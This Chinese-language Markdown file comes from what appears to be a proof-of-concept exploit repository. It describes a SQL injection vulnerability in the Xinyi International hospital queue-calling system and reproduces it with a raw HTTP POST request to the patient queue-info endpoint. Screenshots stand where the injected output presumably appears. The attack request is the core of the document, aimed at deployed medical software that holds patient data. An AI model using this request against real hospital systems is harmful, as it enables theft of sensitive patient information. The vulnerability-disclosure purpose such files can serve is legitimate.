POC/wpoc/心医国际数字医疗/心医国际排队叫号系统/心医国际排队叫号系统SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

32 lines
2.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 心医国际排队叫号系统SQL注入漏洞
**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">
</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商铺建并运营全国领先的智能医疗云平台依托十年的数据积累和业务实践持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度助力政府、医院及产业合作伙伴打造线上线下高效协同的智慧医疗健康服务体系目前已建成覆盖全国31个省联结2万余家医疗机构的智能医疗云平台助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心医国际排队叫号系统存在SQL注入漏洞攻击者可通过该漏洞获取系统敏感信息
</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">
</font><font style="color:rgb(38, 38, 38);">心医国际排队叫号系统</font>
![1714370816089-16a52d5d-c05c-428d-b89c-edb192fe6512.png](./img/s5tva-HDWfzF2MGk/1714370816089-16a52d5d-c05c-428d-b89c-edb192fe6512-526235.png)<font style="color:rgb(38, 38, 38);">
</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>**
```plain
POST /showqueue/showqueue/patient/queryQueueInfo HTTP/1.1
Host:
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 104
patientstatus=&queueID=&department=&waitarea=&name=&startTime=&endTime=&curPage=0&queueNumber=&operator=
```
![1714374261063-c303ed6b-542b-49e7-b544-24d37b429933.png](./img/s5tva-HDWfzF2MGk/1714374261063-c303ed6b-542b-49e7-b544-24d37b429933-518638.png)
> 更新: 2024-06-17 09:27:35
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aa43lw54m4qgvg9s>